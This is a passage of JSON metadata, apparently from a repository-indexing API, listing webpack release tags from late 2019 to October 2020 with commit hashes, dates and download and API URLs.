ag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/